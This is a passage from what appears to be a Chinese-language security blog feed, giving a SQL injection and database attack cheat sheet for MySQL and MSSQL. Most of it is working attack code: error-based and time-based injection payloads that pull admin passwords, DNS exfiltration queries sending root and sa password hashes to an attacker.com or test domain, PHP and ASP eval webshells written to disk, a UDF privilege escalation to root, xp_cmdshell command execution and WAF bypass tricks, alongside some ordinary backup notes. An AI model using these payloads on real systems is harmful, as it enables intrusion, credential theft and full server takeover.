concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) </span></div><div class="line"><span class="string">-- and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x74 LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">/*</span></div><div class="line"><span class="string">and (select 1 from</span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,string) FROM t limit 2,1) -- #a:100684d61405e723#</span></div><div class="line"><span class="string">-- "hkruo"</span></div><div class="line"><span class="string">,floor(rand(0)*2))x from information_schema.tables group by x)a</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">*/</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">and (select 1 from </span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,string) FROM t limit 2,1) -- #a:100684d61405e723#</span></div><div class="line"><span class="string">,floor(rand(0)*2))x </span></div><div class="line"><span class="string">from information_schema.tables group by x</span></div><div class="line"><span class="string">)b</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">and (select 1 from </span></div><div class="line"><span class="string">(</span></div><div class="line"><span class="string">select count(*),concat(</span></div><div class="line"><span class="string">(SELECT distinct concat(0x23,password) FROM admin limit 2,1)</span></div><div class="line"><span class="string">,floor(rand(0)*2))x </span></div><div class="line"><span class="string">from information_schema.tables group by x</span></div><div class="line"><span class="string">)b</span></div><div class="line"><span class="string">)</span></div><div class="line"><span class="string"></span></div><div class="line"><span class="string">en'</span>)+<span class="keyword">and</span>+(<span class="keyword">select</span> <span class="number">1</span> <span class="keyword">from</span> (<span class="keyword">select</span> <span class="keyword">count</span>(*),<span class="keyword">concat</span>((<span class="keyword">SELECT</span> <span class="keyword">distinct</span> <span class="keyword">concat</span>(<span class="number">0x23</span>,<span class="keyword">password</span>) <span class="keyword">FROM</span> <span class="keyword">admin</span> <span class="keyword">limit</span> <span class="number">2</span>,<span class="number">1</span>),<span class="keyword">floor</span>(<span class="keyword">rand</span>(<span class="number">0</span>)*<span class="number">2</span>))x <span class="keyword">from</span> information_schema.tables <span class="keyword">group</span> <span class="keyword">by</span> x)b) <span class="keyword">and</span> (<span class="string">'JonM'</span>=<span class="string">'JonM</span></div></pre></td></tr></table></figure>
<h3 id="延时注入"><a href="#延时注入" class="headerlink" title="延时注入"></a>延时注入</h3><p>延时函数<br>Mysql BENCHMARK(100000,MD5(1)) or sleep(5)<br>Postgresql PG_SLEEP(5) OR GENERATE_SERIES(1,10000)<br>MSSQL WAITFOR DELAY ‘0:0:5’</p>
<p>查询延时<br>select * from test.t where name = ‘a’</p>
<p>Payload<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">' or If(substr('ruo',1,1) = 'r',sleep(5),0)</div><div class="line">' and if(true,sleep(5),0) # </div><div class="line">' union <span class="keyword">select</span> <span class="keyword">benchmark</span>(<span class="number">500000</span>,<span class="keyword">md5</span>(<span class="string">'test'</span>));</div></pre></td></tr></table></figure></p>
<h3 id="DNS传输数据"><a href="#DNS传输数据" class="headerlink" title="DNS传输数据"></a>DNS传输数据</h3><p>配置域名<br>A test 153.92.xxx.xxx<br>NS ns1 test.domainname.com</p>
<p>语句<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">password</span> <span class="keyword">FROM</span> mysql.user <span class="keyword">WHERE</span> <span class="keyword">user</span>=<span class="string">'root'</span> <span class="keyword">LIMIT</span> <span class="number">1</span>),<span class="string">'.ns1.domainname.com\\foo'</span>));</div></pre></td></tr></table></figure></p>
<p>测试<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">select</span> * <span class="keyword">from</span> t <span class="keyword">WHERE</span> <span class="string">`name`</span> = <span class="string">'a'</span> </div><div class="line"><span class="keyword">or</span> <span class="keyword">if</span>((<span class="keyword">SELECT</span> <span class="keyword">LOAD_FILE</span>(<span class="keyword">CONCAT</span>(<span class="string">'\\\\'</span>,(<span class="keyword">SELECT</span> <span class="keyword">hex</span>(<span class="keyword">user</span>())),<span class="string">'.ns1.domainname.com\\foo'</span>))),<span class="number">1</span>,<span class="number">1</span>)</div></pre></td></tr></table></figure></p>
<p>使用dnschef接收数据<br><code>[22:29:07] 61.139.113.158: proxying the response of type 'A' for 726F6F74406C6F63616C686F7374.ns1.domain.com</code></p>
<blockquote>
<p>Note</p>
<ol>
<li>考虑LOAD_FILE被禁用的情况</li>
<li>本地DNS无法解析</li>
</ol>
</blockquote>
<h3 id="文件操作"><a href="#文件操作" class="headerlink" title="文件操作"></a>文件操作</h3><blockquote>
<p>在写文件或是shell的时候可能有些引号导致出错,这里我们可以考虑将其转换成16进制写入。如果mysql配置了 –secure-file-priv 参数将限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()函数的使用。</p>
</blockquote>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div></pre></td><td class="code"><pre><div class="line"><span class="comment">/* 写webshell */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="string">'<?php eval($_POST[ru0]);phpinfo();?>'</span>)</div><div class="line"><span class="keyword">select</span> <span class="number">0x3C3F706870206576616C28245F504F53545B7275305D293B706870696E666F28293B3F3E</span> <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/r1.php'</span></div><div class="line"></div><div class="line"><span class="comment">/* 还原16进制数据/etc/passwd */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">unhex</span>(<span class="string">'2F6574632F706173737764'</span>);</div><div class="line"></div><div class="line"><span class="comment">/* 将16进制的数据保存到文本文件中 */</span></div><div class="line"><span class="keyword">select</span> <span class="keyword">hex</span>(<span class="keyword">load_file</span>(<span class="string">'D:/Test/setup.exe'</span>)) <span class="keyword">into</span> <span class="keyword">outfile</span> <span class="string">'D:/Test/hex16f.txt'</span>;</div><div class="line"></div><div class="line"><span class="comment">/* 导出为2进制文件 */</span></div><div class="line"><span class="keyword">select</span> <span class="number">0x4D5A90000300000004000000</span><span class="comment">/*16进制数据*/</span> <span class="keyword">into</span> <span class="keyword">dumpfile</span> <span class="string">'D:/Test/file.exe'</span>;</div></pre></td></tr></table></figure>
<blockquote>
<p>Note</p>
<ol>
<li>将原程序转换成16进制在写入文件的时候需要使用into dumpfile,不能使用into outfile。</li>
<li>导出时不要忘记字符串开头0x符号。</li>
</ol>
</blockquote>
<h3 id="UDF"><a href="#UDF" class="headerlink" title="UDF"></a>UDF</h3><p>Linux:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div><div class="line">17</div><div class="line">18</div><div class="line">19</div><div class="line">20</div><div class="line">21</div><div class="line">22</div><div class="line">23</div></pre></td><td class="code"><pre><div class="line">$ id</div><div class="line">uid=500(raptor) gid=500(raptor) groups=500(raptor)</div><div class="line">$ gcc -g -c raptor_udf2.c</div><div class="line">$ gcc -g -shared -W1,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc</div><div class="line">$ mysql -u root -p</div><div class="line">Enter password:</div><div class="line">[...]</div><div class="line">mysql> use mysql;</div><div class="line">mysql> create table foo(line blob);</div><div class="line">mysql> insert into foo values(load_file('/home/raptor/raptor_udf2.so'));</div><div class="line">mysql> select * from foo into dumpfile '/usr/lib/raptor_udf2.so';</div><div class="line">mysql> create function do_system returns integer soname 'raptor_udf2.so';</div><div class="line">mysql> select * from mysql.func;</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">| name | ret | dl | type |</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">| do_system | 2 | raptor_udf2.so | function |</div><div class="line">+-----------+-----+----------------+----------+</div><div class="line">mysql> select do_system('id > /tmp/out; chown raptor.raptor /tmp/out');</div><div class="line">mysql> \! sh</div><div class="line">sh-2.05b$ cat /tmp/out</div><div class="line">uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)</div><div class="line">[...]</div></pre></td></tr></table></figure></p>
<p>Windows:</p>
<p>S1. 编译udf</p>
<p>udf源码<br><a href="http://www.mysqludf.org/" target="_blank" rel="external">http://www.mysqludf.org/</a><br><a href="https://github.com/sqlmapproject/udfhack" target="_blank" rel="external">https://github.com/sqlmapproject/udfhack</a></p>
<p>编译32位版本<br>MYSQL: 4.1.22<br>编译头文件: mysql-4.1.22-win32\include</p>
<p>将lib_mysqludf_sys.dll放入 c:\windows 目录内,高版本放到plugin目录(有bug,某些命令会导致MYSQL程序崩溃。)</p>
<blockquote>
<p>Important<br>udf文件存放路径和流类型创建plugin目录(select ‘xxx’ into dumpfile ‘C:\WINDOWS\TEMP\plugin::$INDEX_ALLOCATION’;)需对照目标版本针对性测试。</p>
</blockquote>
<p>S2. 创建函数</p>
<p>查看版本<br>select version();</p>
<p>查看plugin目录路径<br>SHOW VARIABLES LIKE ‘%plugin%’</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">mysql>use mysql;</div><div class="line">mysql>CREATE FUNCTION sys_exec RETURNS string SONAME <span class="string">'lib_mysqludf_sys.dll'</span>;</div><div class="line">mysql>SELECT * from mysql.func;</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">| name | ret | dl | <span class="built_in">type</span> |</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">| sys_exec | 0 | lib_mysqludf_sys1.dll | <span class="keyword">function</span> |</div><div class="line">+----------+-----+-----------------------+----------+</div><div class="line">mysql>SELECT sys_exec(<span class="string">'whoami > d:/11.txt'</span>);</div><div class="line">mysql>DROP FUNCTION sys_exec;</div></pre></td></tr></table></figure>
<h3 id="MYSQL-FEDERATED"><a href="#MYSQL-FEDERATED" class="headerlink" title="MYSQL FEDERATED"></a>MYSQL FEDERATED</h3><p>The FEDERATED storage engine lets you access data from a remote MySQL database without using replication or cluster technology.The FEDERATED storage engine is not enabled by default in the running server; to enable FEDERATED, you must start the MySQL server binary using the –federated option.</p>
<p><img src="https://i.imgur.com/gDDme2b.png" alt=""></p>
<p>Create FEDERATED Tables</p>
<p>ST1</p>
<ol>
<li>创建远程表<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> <span class="string">`T1`</span>(</div><div class="line"><span class="keyword">id</span> <span class="built_in">INT</span>(<span class="number">20</span>) <span class="keyword">NOT</span> <span class="literal">NULL</span> AUTO_INCREMENT,</div><div class="line"><span class="string">`name`</span> <span class="built_in">VARCHAR</span>(<span class="number">100</span>),</div><div class="line">PRIMARY <span class="keyword">KEY</span> (<span class="keyword">id</span>)</div><div class="line">)</div><div class="line"><span class="keyword">ENGINE</span>=MYISAM;</div></pre></td></tr></table></figure>
</li>
</ol>
<p>ST2</p>
<ol>
<li><p>在my.ini中开启federated存储引擎</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">[mysqld]</div><div class="line">federated</div></pre></td></tr></table></figure>
</li>
<li><p>使用 CONNECTION 创建 FEDERATED 表</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> <span class="string">`T1_FEDERATED`</span>(</div><div class="line"><span class="keyword">id</span> <span class="built_in">INT</span>(<span class="number">20</span>) <span class="keyword">NOT</span> <span class="literal">NULL</span> AUTO_INCREMENT,</div><div class="line"><span class="string">`name`</span> <span class="built_in">VARCHAR</span>(<span class="number">100</span>),</div><div class="line">PRIMARY <span class="keyword">KEY</span> (<span class="keyword">id</span>)</div><div class="line">)</div><div class="line"><span class="keyword">ENGINE</span>=FEDERATED</div><div class="line"><span class="keyword">CONNECTION</span>=<span class="string">'mysql://root:password@127.0.0.1:3306/test/T1'</span>;</div></pre></td></tr></table></figure>
</li>
</ol>
<blockquote>
<p>Note<br>The remote server must be a MySQL server.<br>Care should be taken when creating a FEDERATED table since the index definition from an equivalent MyISAM or other table may not be supported.</p>
</blockquote>
<p>How to attack?<br>在开启引擎的情况下可以通过其他用户访问本地其他表</p>
<h3 id="Restoring-Orphan-File-Per-Table-ibd-Files"><a href="#Restoring-Orphan-File-Per-Table-ibd-Files" class="headerlink" title="Restoring Orphan File-Per-Table ibd Files"></a>Restoring Orphan File-Per-Table ibd Files</h3><p>在有.frm和.ibd文件的时候(独立表空间,innodb_file_per_table=1)恢复数据库,首先确保当前数据库和待恢复数据库版本一致!</p>
<p>ST1</p>
<ol>
<li>获取表结构<br>建立同名数据库<br>mysql> CREATE DATABASE dbname;</li>
<li>将.frm文件拖入相应的数据库目录下</li>
<li>查看表结构<br>mysql> SHOW CREATE TABLE tbname;</li>
</ol>
<blockquote>
<p>Note<br>恢复表结构方式2(推荐使用)<br>MySQL Utilities<br><a href="https://dev.mysql.com/downloads/utilities/" target="_blank" rel="external">https://dev.mysql.com/downloads/utilities/</a><br>$ mysqlfrm –basedir=/usr/local/bin/mysql test1:db1.frm –port=3333</p>
</blockquote>
<p>ST2</p>
<ol>
<li>使用导出的语句创建表结构</li>
<li>分离当前表空间<br>mysql> ALTER TABLE dbname.tbname DISCARD TABLESPACE;</li>
<li>拷贝要恢复的.idb文件到新数据库目录下(在Linux下确保.ibd文件有合适的权限)</li>
<li>导入.ibd文件<br>mysql> ALTER TABLE dbname.tbname IMPORT TABLESPACE; SHOW WARNINGS; </li>
</ol>
<h3 id="绕过WAF"><a href="#绕过WAF" class="headerlink" title="绕过WAF"></a>绕过WAF</h3><p>WAF拦截流程<br>数据清洗 -> 规则匹配</p>
<p>大小写转换 union -> UnIon<br>删除型过滤 union -> unioUNIONn<br><> 等价于 BETWEEN<br>= 等价于 like<br>Hex() bin() 等价于ascii()<br>Sleep() 等价于 benchmark()<br>Mid()substring() 等价于 substr()<br>@@user 等价于 User()<br>@@Version 等价于 version()<br>mysql支持 &&,||<br><code>+ 加号当空格</code><br><code>/*Comments*/ 注释当空格</code><br><code>CONCAT/*Comments*/('a','test');</code> //函数名与左括号之间可以存在特殊字符<br><code>where name = 8E0union select 'test'</code> // 8.0union select ‘test’ 无法绕过正则匹配union\sselect<br><code>UNION/*!12345select all*/1,2</code> //union all select 1,2<br>?<br>` 起到注释<br>union%250Cselect %250C空白符<br>union%25A0select<br>mysql 忽略未知的编码</p>
<blockquote>
<p>Note<br>通过日志查看mysql语句执行情况<br>配置my.ini开启日志<br>[mysqld]<br>log = mysql.log<br>或者<br>set global general_log=1;</p>
</blockquote>
<h3 id="存储过程"><a href="#存储过程" class="headerlink" title="存储过程"></a>存储过程</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div><div class="line">11</div><div class="line">12</div><div class="line">13</div><div class="line">14</div><div class="line">15</div><div class="line">16</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">use</span> <span class="keyword">test</span>;</div><div class="line"><span class="keyword">DROP</span> <span class="keyword">PROCEDURE</span> <span class="keyword">IF</span> <span class="keyword">EXISTS</span> <span class="keyword">test</span>;</div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">PROCEDURE</span> <span class="keyword">test</span>()</div><div class="line"><span class="keyword">BEGIN</span></div><div class="line"> <span class="keyword">DECLARE</span> i <span class="built_in">INT</span> <span class="keyword">DEFAULT</span> <span class="number">1</span>;</div><div class="line"> #SET i=1;</div><div class="line"> WHILE i < 3608 DO</div><div class="line"> #CREATE TABLE ti(id int) ENGINE=InnoDB;</div><div class="line"> <span class="keyword">set</span> @sql_create_table = <span class="keyword">concat</span>(<span class="string">'CREATE TABLE IF NOT EXISTS tb_'</span>,i,<span class="string">'(id int) ENGINE=InnoDB'</span>);</div><div class="line"> <span class="keyword">PREPARE</span> sql_create_table <span class="keyword">FROM</span> @sql_create_table;</div><div class="line"> <span class="keyword">EXECUTE</span> sql_create_table;</div><div class="line"> <span class="keyword">SET</span> i=i+<span class="number">1</span>;</div><div class="line"> <span class="keyword">END</span> <span class="keyword">WHILE</span>;</div><div class="line"><span class="keyword">END</span>;</div><div class="line"></div><div class="line"><span class="keyword">CALL</span> <span class="keyword">test</span>()</div></pre></td></tr></table></figure>
<h3 id="备份还原"><a href="#备份还原" class="headerlink" title="备份还原"></a>备份还原</h3><p>转储SQL文件</p>
<p>mysqldump -h ip -uroot -pPassword dbname table1 table2 > backup.sql</p>
<p>mysqlhotcopy</p>
<p>恢复</p>
<p>mysql -u root -pPassword dbname < backup.sql</p>
<blockquote>
<p>Note<br>如果出现语法错误等需设置最大数据包参数<br>mysql> set global max_allowed_packet=268435456;</p>
</blockquote>
<h2 id="MSSQL"><a href="#MSSQL" class="headerlink" title="MSSQL"></a>MSSQL</h2><h3 id="常用语句"><a href="#常用语句" class="headerlink" title="常用语句"></a>常用语句</h3><p>获取数据库文件路径</p>
<p><code>select database_id,name,physical_name AS CurrentLocation,state_desc,size from sys.master_files where database_id=db_id(N'wx');</code> </p>
<p>当前数据库名 db_name()<br>当前用户 user<br>服务器名 @@SERVERNAME</p>
<p>数据库名</p>
<p>select name from master.dbo.sysdatabases where dbid=1</p>
<p>查看表名</p>
<p>select top 1 name from 库名.dbo.sysobjects where xtype=’U’</p>
<p>查看表对应的id</p>
<p>select id from sl.dbo.sysobjects where xtype=’U’ and name=’users’</p>
<p>通过表id查询其列名</p>
<p>select name from sl.dbo.syscolumns where id=1937441976</p>
<p>添加角色</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">CREATE</span> LOGIN ruo <span class="keyword">WITH</span> <span class="keyword">PASSWORD</span> = <span class="string">'123456'</span>;</div><div class="line">EXEC sp_addsrvrolemember 'ruo', 'sysadmin'</div></pre></td></tr></table></figure>
<p>常用函数</p>
<p>COL_NAME ( table_id , column_id )<br>IS_SRVROLEMEMBER (‘sysadmin’)<br>IS_MEMBER (‘db_owner’)<br>EXISTS/NOT EXISTS<br>IN/ONT IN</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="comment">--遍历表名</span></div><div class="line"><span class="keyword">SELECT</span> TOP <span class="number">1</span> <span class="keyword">name</span> <span class="keyword">FROM</span> sl.dbo.sysobjects <span class="keyword">WHERE</span> xtype=<span class="string">'U'</span> </div><div class="line"> <span class="keyword">AND</span> <span class="keyword">NAME</span> <span class="keyword">NOT</span> <span class="keyword">IN</span> (<span class="keyword">SELECT</span> TOP N <span class="keyword">NAME</span> <span class="keyword">FROM</span> sl.dbo.sysobjects <span class="keyword">WHERE</span> xtype=<span class="string">'U'</span>)</div></pre></td></tr></table></figure>
<p>将多行值转成一列<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div></pre></td><td class="code"><pre><div class="line"><span class="comment">-- 获取表列名</span></div><div class="line"><span class="keyword">DECLARE</span> @<span class="keyword">col</span> <span class="built_in">varchar</span>(<span class="number">1000</span>)=<span class="string">''</span>;</div><div class="line"><span class="keyword">SELECT</span> @<span class="keyword">col</span> = @<span class="keyword">col</span> + <span class="keyword">name</span> + <span class="string">','</span> <span class="keyword">FROM</span> SysColumns <span class="keyword">WHERE</span> <span class="keyword">id</span>=Object_Id(<span class="string">'Users'</span>);</div><div class="line"><span class="comment">--PRINT RTRIM(@col);</span></div></pre></td></tr></table></figure></p>
<p>SELECT ‘,’+Name FROM SysColumns WHERE id=Object_Id(‘Users’) FOR XML PATH(‘’)</p>
<p>查看table表列名<br><code>SELECT COL_NAME(OBJECT_ID('table'), 1)</code></p>
<p>猜列值<br>ascii(substring(COL_NAME(OBJECT_ID(‘Users’),1),1,1)) > 0 // 第几个字段,第几个字母</p>
<p>UNICODE(SUBSTRING((SELECT%0a ISNULL(CAST(LTRIM(STR(LEN(COL_NAME(OBJECT_ID(‘table’),1)))) AS NVARCHAR(4000)),CHAR(32))),1,1))>48</p>
<h3 id="命令执行"><a href="#命令执行" class="headerlink" title="命令执行"></a>命令执行</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line">EXEC sp_configure '<span class="keyword">show</span> <span class="keyword">advanced</span> options<span class="string">',1 //允许修改高级参数</span></div><div class="line"><span class="string">EXEC sp_configure '</span>xp_cmdshell<span class="string">',1 //打开xp_cmdshell扩展</span></div><div class="line"><span class="string">EXEC master..dbo.xp_cmdshell '</span>whomai<span class="string">'</span></div></pre></td></tr></table></figure>
<h3 id="Public-权限列目录"><a href="#Public-权限列目录" class="headerlink" title="Public 权限列目录"></a>Public 权限列目录</h3><p>获取C:下目录名<br><code>EXEC master..xp_dirtree 'c:/',1</code></p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div><div class="line">6</div><div class="line">7</div><div class="line">8</div><div class="line">9</div><div class="line">10</div></pre></td><td class="code"><pre><div class="line">IF OBJECT_ID('tempdb..##DirectoryTree') IS NOT NULL</div><div class="line"> <span class="keyword">DROP</span> <span class="keyword">TABLE</span> ##DirectoryTree;</div><div class="line"></div><div class="line"><span class="keyword">CREATE</span> <span class="keyword">TABLE</span> ##DirectoryTree (</div><div class="line"> <span class="keyword">id</span> <span class="built_in">int</span> <span class="keyword">IDENTITY</span>(<span class="number">1</span>,<span class="number">1</span>),</div><div class="line"> subdirectory <span class="keyword">nvarchar</span>(<span class="number">512</span>),</div><div class="line"> <span class="keyword">depth</span> <span class="built_in">int</span>,</div><div class="line"> isfile <span class="built_in">bit</span>);</div><div class="line"></div><div class="line"><span class="keyword">INSERT</span> ##DirectoryTree (subdirectory,<span class="keyword">depth</span>,isfile) EXEC master..xp_dirtree <span class="string">'c:/'</span>,<span class="number">1</span>,<span class="number">1</span>;</div></pre></td></tr></table></figure>
<p>DNS传输数据</p>
<figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">DECLARE</span> @host <span class="built_in">varchar</span>(<span class="number">1024</span>);</div><div class="line"><span class="keyword">SELECT</span> @host=(<span class="keyword">SELECT</span> TOP <span class="number">1</span> master.dbo.fn_varbintohexstr(password_hash) <span class="keyword">FROM</span> sys.sql_logins <span class="keyword">WHERE</span> <span class="keyword">name</span>=<span class="string">'sa'</span>)+<span class="string">'.attacker.com'</span>;</div><div class="line">EXEC master..xp_dirtree "\\'+@host+'\foobar$";</div></pre></td></tr></table></figure>
<h3 id="备份数据库"><a href="#备份数据库" class="headerlink" title="备份数据库"></a>备份数据库</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">BACKUP</span> <span class="keyword">DATABASE</span> database_name </div><div class="line"> <span class="keyword">TO</span> DISK = <span class="string">'D:\backup.bak'</span></div></pre></td></tr></table></figure>
<h3 id="备份还原-1"><a href="#备份还原-1" class="headerlink" title="备份还原"></a>备份还原</h3><p>ST1 创建数据库。<br>ST2 返回由备份集内包含的数据库和日志文件列表组成的结果集。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">RESTORE</span> FILELISTONLY</div><div class="line"> <span class="keyword">FROM</span> DISK = <span class="string">' D:\Hs.bak '</span></div></pre></td></tr></table></figure></p>
<p>ST3 还原并指定数据库物理文件名称及路径。<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div><div class="line">4</div><div class="line">5</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">RESTORE</span> <span class="keyword">DATABASE</span> database_name </div><div class="line"> <span class="keyword">FROM</span> DISK = <span class="string">'D:\Hs.bak'</span></div><div class="line"><span class="keyword">WITH</span> <span class="keyword">REPLACE</span>,</div><div class="line"><span class="keyword">MOVE</span> <span class="string">'HealthSchoolMIS_Data'</span> <span class="keyword">TO</span> <span class="string">'D:\DATA\HealthSchoolMIS_Data.MDF'</span>,</div><div class="line"><span class="keyword">MOVE</span> <span class="string">'HealthSchoolMIS_Log'</span> <span class="keyword">TO</span> <span class="string">'D:\DATA\HealthSchoolMIS_Log.LDF'</span></div></pre></td></tr></table></figure></p>
<h3 id="数据库备份shell"><a href="#数据库备份shell" class="headerlink" title="数据库备份shell"></a>数据库备份shell</h3><p>第一次进行全量备份<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">alter</span> <span class="keyword">database</span> database_name <span class="keyword">set</span> <span class="keyword">RECOVERY</span> <span class="keyword">FULL</span> //第一次对数据库进行一次全备份</div><div class="line"><span class="keyword">backup</span> <span class="keyword">database</span> database_name <span class="keyword">to</span> disk = <span class="string">'d:\1.asp'</span></div><div class="line"><span class="keyword">BACKUP</span> <span class="keyword">LOG</span> cannot be performed because there <span class="keyword">is</span> <span class="keyword">no</span> <span class="keyword">current</span> <span class="keyword">database</span> backup.</div></pre></td></tr></table></figure></p>
<p>建立cmd表,并写入值<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div><div class="line">3</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">create</span> <span class="keyword">table</span> cmd (a image)</div><div class="line"><span class="keyword">insert</span> <span class="keyword">into</span> cmd (a) <span class="keyword">values</span> (<span class="number">0x3C256576616C20726571756573742822732229253E</span>)</div><div class="line"><span class="number">0x3C256576616C20726571756573742822732229253E</span> -> <%eval request(<span class="string">"s"</span>)%></div></pre></td></tr></table></figure></p>
<p>进行增量备份<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">backup</span> <span class="keyword">log</span> database_name </div><div class="line"> <span class="keyword">to</span> disk = <span class="string">'c:\1.asp'</span></div></pre></td></tr></table></figure></p>
<h3 id="文件上传"><a href="#文件上传" class="headerlink" title="文件上传"></a>文件上传</h3><p>将数据插入本地表<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line"><span class="keyword">create</span> <span class="keyword">table</span> temp (<span class="keyword">data</span> <span class="built_in">text</span>)</div><div class="line"><span class="keyword">bulk</span> <span class="keyword">insert</span> temp <span class="keyword">from</span> <span class="string">'d:\test.txt'</span> <span class="keyword">with</span> (codepage=<span class="string">'RAW'</span>)</div></pre></td></tr></table></figure></p>
<p>bcp {dbtable | query} {in | out | queryout | format} 数据文件<br>数据库名dbtable -> in/out<br>查询query -> queryout</p>
<p>远程连接攻击数据库导出为文件<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div></pre></td><td class="code"><pre><div class="line">EXEC master..xp_cmdshell 'bcp "<span class="keyword">SELECT</span> * <span class="keyword">FROM</span> test.dbo.temp<span class="string">" queryout d:\tset1.txt -c -S"</span>服务器地址<span class="string">" -U"</span>username<span class="string">" -P"</span><span class="keyword">password</span><span class="string">"'</span></div></pre></td></tr></table></figure></p>
<p>在数据库中<br>导出test数据库中temp表内容到文件(二进制文件也行)<br><figure class="highlight sql"><table><tr><td class="gutter"><pre><div class="line">1</div><div class="line">2</div></pre></td><td class="code"><pre><div class="line">EXEC master..xp_cmdshell 'bcp test.dbo.temp out d:\tset1.txt -c -T' </div><div class="line">EXEC master..xp_cmdshell 'bcp "<span class="keyword">select</span> * <span class="keyword">from</span> test.dbo.temp<span class="string">" queryout "</span>d:\test.exe<span class="string">" -c -T'</span></div></pre></td></tr></table></figure></p>
<h2 id="Oracle"><a href="#Oracle" class="headerlink" title="Oracle"></a>Oracle</h2>]]></content>
</entry>
